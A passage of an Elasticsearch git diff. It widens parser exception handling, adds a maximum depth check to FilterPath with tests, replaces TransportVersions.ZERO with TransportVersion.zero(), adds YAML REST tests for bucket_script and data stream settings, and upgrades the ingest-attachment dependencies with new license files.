parser.getDoubleValue(); - } catch (InputCoercionException | JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } @@ -270,8 +294,8 @@ public double doDoubleValue() throws IOException { public byte[] binaryValue() throws IOException { try { return parser.getBinaryValue(); - } catch (JsonParseException e) { - throw newXContentParseException(e); + } catch (IOException e) { + throw handleParserException(e); } } diff --git a/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java b/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java index df52eeb3632ad..de74def939723 100644 --- a/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java +++ b/libs/x-content/impl/src/test/java/org/elasticsearch/xcontent/provider/json/ESUTF8StreamJsonParserTests.java @@ -76,6 +76,18 @@ public void testGetValueAsText() throws IOException { assertThat(parser.getValueAsString(), Matchers.equalTo("bår")); }); + testParseJson("{\"foo\": \"\uD83D\uDE0A\"}", parser -> { + assertThat(parser.nextToken(), Matchers.equalTo(JsonToken.START_OBJECT)); + assertThat(parser.nextFieldName(), Matchers.equalTo("foo")); + assertThat(parser.nextValue(), Matchers.equalTo(JsonToken.VALUE_STRING)); + + var text = parser.getValueAsText(); + assertThat(text, Matchers.notNullValue()); + var bytes = text.bytes(); + assertTextRef(bytes, "\uD83D\uDE0A"); + assertThat(text.stringLength(), Matchers.equalTo(2)); + }); + testParseJson("{\"foo\": \"bår\"}", parser -> { assertThat(parser.nextToken(), Matchers.equalTo(JsonToken.START_OBJECT)); assertThat(parser.nextFieldName(), Matchers.equalTo("foo")); @@ -143,12 +155,9 @@ private record TestInput(String input, String result, boolean supportsOptimized) new TestInput("\\/", "/", true), new TestInput("\\\\", "\\", true) }; - private int randomCodepoint(boolean includeAscii) { + private int randomCodepointIncludeAscii() { while (true) { char val = Character.toChars(randomInt(0xFFFF))[0]; - if (val <= 0x7f && includeAscii == false) { - continue; - } if (val >= Character.MIN_SURROGATE && val <= Character.MAX_SURROGATE) { continue; } @@ -156,6 +165,27 @@ private int 
randomCodepoint(boolean includeAscii) { } } + private int randomCodepointIncludeOutsideBMP(int remainingLength) { + while (true) { + int codePoint = randomInt(0x10FFFF); + char[] val = Character.toChars(codePoint); + // Don't include ascii + if (val.length == 1 && val[0] <= 0x7F) { + continue; + } + boolean surrogate = val[0] >= Character.MIN_SURROGATE && val[0] <= Character.MAX_SURROGATE; + // Single surrogate is invalid + if (val.length == 1 && surrogate) { + continue; + } + // Not enough remaining space for a surrogate pair + if (remainingLength < 2 && surrogate) { + continue; + } + return codePoint; + } + } + private TestInput buildRandomInput(int length) { StringBuilder input = new StringBuilder(length); StringBuilder result = new StringBuilder(length); @@ -171,13 +201,14 @@ private TestInput buildRandomInput(int length) { doesSupportOptimized = doesSupportOptimized && escape.supportsOptimized(); } case 1 -> { - int value = randomCodepoint(true); + int value = randomCodepointIncludeAscii(); input.append(String.format(Locale.ENGLISH, "\\u%04x", value)); result.append(Character.toChars(value)); doesSupportOptimized = false; } default -> { - var value = Character.toChars(randomCodepoint(false)); + var remainingLength = length - i; + var value = Character.toChars(randomCodepointIncludeOutsideBMP(remainingLength)); input.append(value); result.append(value); } @@ -222,7 +253,9 @@ public void testGetValueRandomized() throws IOException { String currVal = inputs[i].result(); if (inputs[i].supportsOptimized()) { - assertTextRef(parser.getValueAsText().bytes(), currVal); + var text = parser.getValueAsText(); + assertTextRef(text.bytes(), currVal); + assertThat(text.stringLength(), Matchers.equalTo(currVal.length())); } else { assertThat(parser.getValueAsText(), Matchers.nullValue()); assertThat(parser.getValueAsString(), Matchers.equalTo(currVal)); diff --git a/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java b/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java index 0b9aa17ae3e78..a12ab4e6a85c0 100644 --- a/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java +++ b/libs/x-content/src/main/java/org/elasticsearch/xcontent/support/filtering/FilterPath.java @@ -22,6 +22,9 @@ public class FilterPath { private static final String WILDCARD = "*"; private static final String DOUBLE_WILDCARD = "**"; + // This is ridiculously large, but we can be 100% certain that if any filter tries to exceed this depth then it is a mistake + static final int MAX_TREE_DEPTH = 500; + private final Map termsChildren; private final FilterPath[] wildcardChildren; private final String pattern; @@ -132,6 +135,7 @@ private boolean matchFieldNamesWithDots(String name, int dotIndex, List children; private final boolean isFinalNode; @@ -145,14 +149,19 @@ private static class BuildNode { private final BuildNode root = new BuildNode(false); void insert(String filter) { - insertNode(filter, root); + insertNode(filter, root, 0); } FilterPath build() { return buildPath("", root); } - static void insertNode(String filter, BuildNode node) { + static void insertNode(String filter, BuildNode node, int depth) { + if (depth > MAX_TREE_DEPTH) { + throw new IllegalArgumentException( + "Filter exceeds maximum depth at [" + (filter.length() > 100 ? 
filter.substring(0, 100) : filter) + "]" + ); + } int end = filter.length(); int splitPosition = -1; boolean findEscapes = false; @@ -171,7 +180,7 @@ static void insertNode(String filter, BuildNode node) { String field = findEscapes ? filter.substring(0, splitPosition).replace("\\.", ".") : filter.substring(0, splitPosition); BuildNode child = node.children.computeIfAbsent(field, f -> new BuildNode(false)); if (false == child.isFinalNode) { - insertNode(filter.substring(splitPosition + 1), child); + insertNode(filter.substring(splitPosition + 1), child, depth + 1); } } else { String field = findEscapes ? filter.replace("\\.", ".") : filter; diff --git a/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java b/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java index abe2a78112fd7..5de8b5c1029e6 100644 --- a/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java +++ b/libs/x-content/src/test/java/org/elasticsearch/xcontent/support/filtering/FilterPathTests.java @@ -21,6 +21,7 @@ import static java.util.Collections.singleton; import static org.hamcrest.Matchers.arrayWithSize; +import static org.hamcrest.Matchers.containsString; import static org.hamcrest.Matchers.is; public class FilterPathTests extends ESTestCase { @@ -403,4 +404,16 @@ public void testDotInFieldName() { assertTrue(filterPaths[0].matches("a.b.c.d", nextFilters, true)); assertEquals(nextFilters.size(), 0); } + + public void testDepthChecking() { + final String atLimit = "x" + (".x").repeat(FilterPath.MAX_TREE_DEPTH); + final String aboveLimit = atLimit + ".y"; + + var paths = FilterPath.compile(Set.of(atLimit)); + assertThat(paths, arrayWithSize(1)); + + var ex = expectThrows(IllegalArgumentException.class, () -> FilterPath.compile(Set.of(aboveLimit))); + assertThat(ex.getMessage(), containsString("maximum depth")); + assertThat(ex.getMessage(), containsString("[y]")); + } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java index a53671e4ca668..d4ac360614c71 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/adjacency/AdjacencyMatrixAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.IndexSearcher; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.aggregations.bucket.adjacency.AdjacencyMatrixAggregator.KeyedFilter; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -256,6 +255,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java index 516aed6e61b0a..56eb53a7230f4 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java +++ 
b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/bucket/histogram/AutoDateHistogramAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.bucket.histogram; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -255,7 +254,7 @@ public boolean equals(Object obj) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static class RoundingInfo implements Writeable { diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java index 37ad08ef2c757..d9ad47b85d83d 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/metric/MatrixStatsAggregationBuilder.java @@ -101,6 +101,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java index f2eff8bf8a896..8fc371ceef1be 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSelectorPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -217,6 +216,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java index 8a4eaa41d4b8e..d78dc3e55b12a 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/BucketSortPipelineAggregationBuilder.java @@ -9,7 +9,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.search.aggregations.pipeline.AbstractPipelineAggregationBuilder; @@ -196,6 +195,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git 
a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java index 637efb9d91df7..21b7f3ddbee31 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/DerivativePipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.Rounding; import org.elasticsearch.common.io.stream.StreamInput; @@ -259,6 +258,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java index 551559f80b46e..9ae4572ca6c30 100644 --- a/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java +++ b/modules/aggregations/src/main/java/org/elasticsearch/aggregations/pipeline/MovFnPipelineAggregationBuilder.java @@ -10,7 +10,6 @@ package org.elasticsearch.aggregations.pipeline; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -223,6 +222,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml b/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml index c23c2a7ee52a4..bd093955a910f 100644 --- a/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml +++ b/modules/aggregations/src/yamlRestTest/resources/rest-api-spec/test/aggregations/bucket_script.yml @@ -340,3 +340,31 @@ top level fails: buckets_path: b: b script: params.b + 12 + +--- +invalid parent aggregation: + - requires: + capabilities: + - method: POST + path: /_search + capabilities: [ bucket_script_parent_multi_bucket_error ] + test_runner_features: [capabilities] + reason: "changed error 500 to 400" + - do: + catch: /Expected a multi bucket aggregation but got \[InternalFilter\] for aggregation \[d\]/ + search: + body: + aggs: + a: + filter: + term: + a: 1 + aggs: + b: + sum: + field: b + d: + bucket_script: + buckets_path: + b: b + script: params.b + 12 diff --git a/modules/data-streams/build.gradle b/modules/data-streams/build.gradle index fcd435e29a30d..a4dc90ed54e21 100644 --- a/modules/data-streams/build.gradle +++ b/modules/data-streams/build.gradle @@ -83,7 +83,7 @@ tasks.named("yamlRestCompatTestTransform").configure({ task -> }) configurations { - basicRestSpecs { + restTests { attributes { attribute(ArtifactTypeDefinition.ARTIFACT_TYPE_ATTRIBUTE, ArtifactTypeDefinition.DIRECTORY_TYPE) } @@ -91,5 +91,5 @@ configurations 
{ } artifacts { - basicRestSpecs(new File(projectDir, "src/yamlRestTest/resources/rest-api-spec/test")) + restTests(new File(projectDir, "src/yamlRestTest/resources/rest-api-spec/test")) } diff --git a/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml b/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml index ad09a06378c5e..12d038de77818 100644 --- a/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml +++ b/modules/data-streams/src/yamlRestTest/resources/rest-api-spec/test/data_stream/240_data_stream_settings.yml @@ -327,8 +327,6 @@ setup: index: "my-data-stream-1" wait_for_status: green - - - do: indices.get_data_stream: name: my-data-stream-1 @@ -398,3 +396,96 @@ setup: - match: { .$idx0name.settings.index.number_of_shards: "1" } - match: { .$idx0name.settings.index.lifecycle.name: "my-policy" } - match: { .$idx0name.settings.index.lifecycle.prefer_ilm: "true" } + +--- +"Test null out settings component templates only": + - requires: + cluster_features: [ "logs_stream" ] + reason: requires setting 'logs_stream' to get or set data stream settings + + - do: + cluster.put_component_template: + name: settings-template + body: + template: + settings: + lifecycle.name: my-policy + + - do: + allowed_warnings: + - "index template [my-component-only-template] has index patterns [my-component-only-data-stream-*] matching patterns from existing older templates [global] with patterns (global => [*]); this template [my-component-only-template] will take precedence during new index creation" + indices.put_index_template: + name: my-component-only-template + body: + index_patterns: [ my-component-only-data-stream-* ] + data_stream: { } + composed_of: + - settings-template + + - do: + indices.create_data_stream: + name: my-component-only-data-stream-1 + + - do: + cluster.health: + index: "my-component-only-data-stream-1" + wait_for_status: green + + - do: + indices.get_data_stream: + name: my-component-only-data-stream-1 + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.settings: {} } + - match: { data_streams.0.effective_settings: null } + + - do: + indices.put_data_stream_settings: + name: my-component-only-data-stream-1 + body: + index: + lifecycle: + name: my-new-policy + prefer_ilm: true + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.applied_to_data_stream: true } + - length: { data_streams.0.index_settings_results.applied_to_data_stream_and_backing_indices: 2 } + - match: { data_streams.0.settings.index.lifecycle.name: "my-new-policy" } + - match: { data_streams.0.settings.index.lifecycle.prefer_ilm: "true" } + - match: { data_streams.0.effective_settings.index.lifecycle.name: "my-new-policy" } + - match: { data_streams.0.effective_settings.index.lifecycle.prefer_ilm: "true" } + + - do: + indices.put_data_stream_settings: + name: my-component-only-data-stream-1 + body: + index: + lifecycle: + name: null + prefer_ilm: null + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.applied_to_data_stream: true } + - length: { data_streams.0.index_settings_results.applied_to_data_stream_and_backing_indices: 2 } + - match: { data_streams.0.settings.index.lifecycle.name: null } + - match: { data_streams.0.settings.index.lifecycle.prefer_ilm: null } + - match: { 
data_streams.0.effective_settings.index.lifecycle.name: "my-policy" } + - match: { data_streams.0.effective_settings.index.lifecycle.prefer_ilm: null } + + - do: + indices.get_data_stream_settings: + name: my-component-only-data-stream-1 + - match: { data_streams.0.name: my-component-only-data-stream-1 } + - match: { data_streams.0.settings.index.lifecycle.name: null } + - match: { data_streams.0.settings.index.lifecycle.prefer_ilm: null } + - match: { data_streams.0.effective_settings.index.lifecycle.name: "my-policy" } + - match: { data_streams.0.effective_settings.index.lifecycle.prefer_ilm: null } + + - do: + indices.get_data_stream: + name: my-component-only-data-stream-1 + - set: { data_streams.0.indices.0.index_name: idx0name } + + - do: + indices.get_settings: + index: my-component-only-data-stream-1 + - match: { .$idx0name.settings.index.lifecycle.name: "my-policy" } + - match: { .$idx0name.settings.index.lifecycle.prefer_ilm: null } diff --git a/modules/ingest-attachment/build.gradle b/modules/ingest-attachment/build.gradle index 993c02993c571..7a8198cda930f 100644 --- a/modules/ingest-attachment/build.gradle +++ b/modules/ingest-attachment/build.gradle @@ -19,24 +19,24 @@ esplugin { // when updating tika, please review it's parent pom : https://repo1.maven.org/maven2/org/apache/tika/tika-parent // and manually update the transitive dependencies here def versions = [ - 'tika' : '2.9.3', - 'pdfbox': '2.0.33', - 'poi' : '5.4.0', + 'tika' : '3.2.2', + 'pdfbox': '3.0.5', + 'poi' : '5.4.1', 'sparsebitset' : '1.3', //poi dependency: https://repo1.maven.org/maven2/org/apache/poi/poi/ - 'mime4j': '0.8.12', - 'commonsCodec': '1.18.0', - 'slf4' : '2.0.16', + 'mime4j': '0.8.13', + 'commonsCodec': '1.19.0', + 'slf4' : '2.0.17', 'xz' : '1.10', - 'commonsIo' : '2.18.0', + 'commonsIo' : '2.20.0', //intentionally using the elder "juniversalchardet:juniversalchardet" rather than the newer "com.github.albfernandez:juniversalchardet" //since the "com.github.albfernandez" fork has some problems with Chinese. 
'juniversalchardet' : '1.0.3', - 'tagsoup' : '1.2.1', + 'jsoup' : '1.21.1', 'jempbox' : '1.8.17', 'xmlbeans' : '5.3.0', //poi-ooxml dependency: https://repo1.maven.org/maven2/org/apache/poi/poi-ooxml/ - 'commonsCollections4' : '4.4', - 'commonsCompress' : '1.27.1', - 'commonsLang3' :'3.17.0', + 'commonsCollections4' : '4.5.0', + 'commonsCompress' : '1.28.0', + 'commonsLang3' :'3.18.0', 'commonsMath3' : '3.6.1' ] @@ -86,9 +86,10 @@ dependencies { // external parser libraries // HTML - api "org.ccil.cowan.tagsoup:tagsoup:${versions.tagsoup}" + api "org.jsoup:jsoup:${versions.jsoup}" // Adobe PDF api "org.apache.pdfbox:pdfbox:${versions.pdfbox}" + api "org.apache.pdfbox:pdfbox-io:${versions.pdfbox}" api "org.apache.pdfbox:fontbox:${versions.pdfbox}" api "org.apache.pdfbox:jempbox:${versions.jempbox}" // OpenOffice diff --git a/modules/ingest-attachment/licenses/jsoup-LICENSE.txt b/modules/ingest-attachment/licenses/jsoup-LICENSE.txt new file mode 100644 index 0000000000000..e4bf2be9fb7f2 --- /dev/null +++ b/modules/ingest-attachment/licenses/jsoup-LICENSE.txt @@ -0,0 +1,21 @@ +The MIT License + +Copyright (c) 2009-2025 Jonathan Hedley + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. diff --git a/modules/ingest-attachment/licenses/tagsoup-NOTICE.txt b/modules/ingest-attachment/licenses/jsoup-NOTICE.txt similarity index 100% rename from modules/ingest-attachment/licenses/tagsoup-NOTICE.txt rename to modules/ingest-attachment/licenses/jsoup-NOTICE.txt diff --git a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-LICENSE.txt b/modules/ingest-attachment/licenses/pdfbox-io-LICENSE.txt similarity index 60% rename from x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-LICENSE.txt rename to modules/ingest-attachment/licenses/pdfbox-io-LICENSE.txt index d645695673349..97553f24a432a 100644 --- a/x-pack/plugin/security/lib/nimbus-jose-jwt-modified/licenses/nimbus-jose-jwt-LICENSE.txt +++ b/modules/ingest-attachment/licenses/pdfbox-io-LICENSE.txt @@ -200,3 +200,145 @@ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. + +EXTERNAL COMPONENTS + +Apache PDFBox includes a number of components with separate copyright notices +and license terms. Your use of these components is subject to the terms and +conditions of the following licenses. 
+ +Contributions made to the original PDFBox and FontBox projects: + + Copyright (c) 2002-2007, www.pdfbox.org + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions are met: + + 1. Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + 2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + + 3. Neither the name of pdfbox; nor the names of its contributors may be + used to endorse or promote products derived from this software without + specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE + FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + SUCH DAMAGE. + +Adobe Font Metrics (AFM) for PDF Core 14 Fonts + + This file and the 14 PostScript(R) AFM files it accompanies may be used, + copied, and distributed for any purpose and without charge, with or without + modification, provided that all copyright notices are retained; that the + AFM files are not distributed without this file; that all modifications + to this file or any of the AFM files are prominently noted in the modified + file(s); and that this paragraph is not modified. Adobe Systems has no + responsibility or obligation to support the use of the AFM files. + +CMaps for PDF Fonts (http://opensource.adobe.com/wiki/display/cmap/Downloads) + + Copyright 1990-2009 Adobe Systems Incorporated. + All rights reserved. + + Redistribution and use in source and binary forms, with or without + modification, are permitted provided that the following conditions + are met: + + Redistributions of source code must retain the above copyright notice, + this list of conditions and the following disclaimer. + + Redistributions in binary form must reproduce the above copyright notice, + this list of conditions and the following disclaimer in the documentation + and/or other materials provided with the distribution. + + Neither the name of Adobe Systems Incorporated nor the names of its + contributors may be used to endorse or promote products derived from this + software without specific prior written permission. + + THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF + THE POSSIBILITY OF SUCH DAMAGE. + +PaDaF PDF/A preflight (http://sourceforge.net/projects/padaf) + + Copyright 2010 Atos Worldline SAS + + Licensed by Atos Worldline SAS under one or more + contributor license agreements. See the NOTICE file distributed with + this work for additional information regarding copyright ownership. + Atos Worldline SAS licenses this file to You under the Apache License, Version 2.0 + (the "License"); you may not use this file except in compliance with + the License. You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. + +OSXAdapter + + Version: 2.0 + + Disclaimer: IMPORTANT: This Apple software is supplied to you by + Apple Inc. ("Apple") in consideration of your agreement to the + following terms, and your use, installation, modification or + redistribution of this Apple software constitutes acceptance of these + terms. If you do not agree with these terms, please do not use, + install, modify or redistribute this Apple software. + + In consideration of your agreement to abide by the following terms, and + subject to these terms, Apple grants you a personal, non-exclusive + license, under Apple's copyrights in this original Apple software (the + "Apple Software"), to use, reproduce, modify and redistribute the Apple + Software, with or without modifications, in source and/or binary forms; + provided that if you redistribute the Apple Software in its entirety and + without modifications, you must retain this notice and the following + text and disclaimers in all such redistributions of the Apple Software. + Neither the name, trademarks, service marks or logos of Apple Inc. + may be used to endorse or promote products derived from the Apple + Software without specific prior written permission from Apple. Except + as expressly stated in this notice, no other rights or licenses, express + or implied, are granted by Apple herein, including but not limited to + any patent rights that may be infringed by your derivative works or by + other works in which the Apple Software may be incorporated. + + The Apple Software is provided by Apple on an "AS IS" basis. APPLE + MAKES NO WARRANTIES, EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION + THE IMPLIED WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY AND FITNESS + FOR A PARTICULAR PURPOSE, REGARDING THE APPLE SOFTWARE OR ITS USE AND + OPERATION ALONE OR IN COMBINATION WITH YOUR PRODUCTS. 
+ + IN NO EVENT SHALL APPLE BE LIABLE FOR ANY SPECIAL, INDIRECT, INCIDENTAL + OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + INTERRUPTION) ARISING IN ANY WAY OUT OF THE USE, REPRODUCTION, + MODIFICATION AND/OR DISTRIBUTION OF THE APPLE SOFTWARE, HOWEVER CAUSED + AND WHETHER UNDER THEORY OF CONTRACT, TORT (INCLUDING NEGLIGENCE), + STRICT LIABILITY OR OTHERWISE, EVEN IF APPLE HAS BEEN ADVISED OF THE + POSSIBILITY OF SUCH DAMAGE. + + Copyright (C) 2003-2007 Apple, Inc., All Rights Reserved diff --git a/modules/ingest-attachment/licenses/pdfbox-io-NOTICE.txt b/modules/ingest-attachment/licenses/pdfbox-io-NOTICE.txt new file mode 100644 index 0000000000000..4da75301eaf79 --- /dev/null +++ b/modules/ingest-attachment/licenses/pdfbox-io-NOTICE.txt @@ -0,0 +1,22 @@ +Apache PDFBox +Copyright 2014 The Apache Software Foundation + +This product includes software developed at +The Apache Software Foundation (http://www.apache.org/). + +Based on source code originally developed in the PDFBox and +FontBox projects. + +Copyright (c) 2002-2007, www.pdfbox.org + +Based on source code originally developed in the PaDaF project. +Copyright (c) 2010 Atos Worldline SAS + +Includes the Adobe Glyph List +Copyright 1997, 1998, 2002, 2007, 2010 Adobe Systems Incorporated. + +Includes the Zapf Dingbats Glyph List +Copyright 2002, 2010 Adobe Systems 